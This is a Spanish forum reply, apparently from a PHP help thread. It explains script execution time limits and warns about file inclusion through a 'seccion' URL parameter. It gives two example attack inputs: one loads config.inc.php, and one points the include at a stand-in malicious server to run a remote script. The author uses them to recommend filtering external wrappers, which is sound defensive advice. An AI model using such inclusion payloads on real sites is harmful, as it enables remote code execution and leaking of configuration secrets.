1) .. sobre el listado directorios:

Si, claro .. ese bucle q lea el directorio si contiene tanto archivo ya veras el tiempo que tarda en ejecutarlo .. Tanto que si supera el "time-out" asignado por defecto al tiempo de ejecución máximo de un script (php.ini -> max_execution_time .. suele estar a 30 segundos .. en un phpinfo() tambien lo puedes ver) el script terminará la ejecución a ese tiempo con un mensajito de error sobre el tema de tiempo sobrepasado ..

Ese tiempo de ejecución se puede ajustar usando:
set_time_limit(segundos) ... si indicas 0 sería "tiempo infinito" (tarde lo que tarde en ejecutarse el scritp..)


2) Sobre seguridad ...

Imagina que tienes el tipico config.inc.php por ahí rondando .. hago por ejemplo:

index.php?seccion=config.inc .. y ahí lo cargo en tu sección .. dependerá del resto de programación de la "plantilla" base q uses (ese index.php) podría obtener algun dato del mismo ..

Por lo menos te "medio salva" que indicastes .php por defecto como extensión de la "sección" que cargas ..

Otro problema .. GRAVE es si hago algo tipo:

index.php?seccion=http://miservidormalicioso.tal/miscript_malicioso
(siendo miscript_malicioso.php .. )

Ahí no lo he probado .. no se si se ejecutaría ese escript en miservidor o en el tuyo ..

En tal caso deberias filtrar tu variable "seccion" para que no te pongan http:// o https y otros "wrappers" externos.

Un saludo,